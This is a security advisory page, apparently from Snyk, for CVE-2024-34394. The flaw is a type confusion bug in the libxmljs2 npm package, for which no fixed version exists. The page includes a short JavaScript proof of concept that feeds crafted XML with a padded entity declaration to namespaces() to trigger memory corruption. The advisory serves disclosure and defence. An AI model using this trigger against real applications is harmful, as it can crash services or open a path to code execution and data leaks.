Type Confusion Affecting libxmljs2 package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (10th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-LIBXMLJS2-6808816
- published 5 May 2024
- disclosed 2 May 2024
- credit Unknown
Introduced: 2 May 2024
CVE-2024-34394 Open this link in a new tabHow to fix?
There is no fixed version for libxmljs2
.
Overview
libxmljs2 is a libxml bindings for v8 javascript engine
Affected versions of this package are vulnerable to Type Confusion when parsing a specially crafted XML while invoking the namespaces() function (which invokes XmlNode::get_local_namespaces()
) on a grand-child of a node that refers to an entity.
Exploiting this vulnerability leads to an RCE, data leak DoS on 64-bit and 32-bit systems.
PoC
const libxmljs2 = require('libxmljs2');
var d = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note
[
<!ENTITY writer PUBLIC "` + "A".repeat(8) + "B".repeat(8) + "C".repeat(8) + "D".repeat(8) + "P".repeat(8) + `" "JFrog Security">
]>
<from>&writer;</from>
`;
t = libxmljs2.parseXml(d)
from = t.get('//from')
c = from.childNodes()[0]
c2 = c.childNodes()[0] //entity_decl
n = c2.namespaces(true) //onlyLocal = true
References
CVSS Scores
version 3.1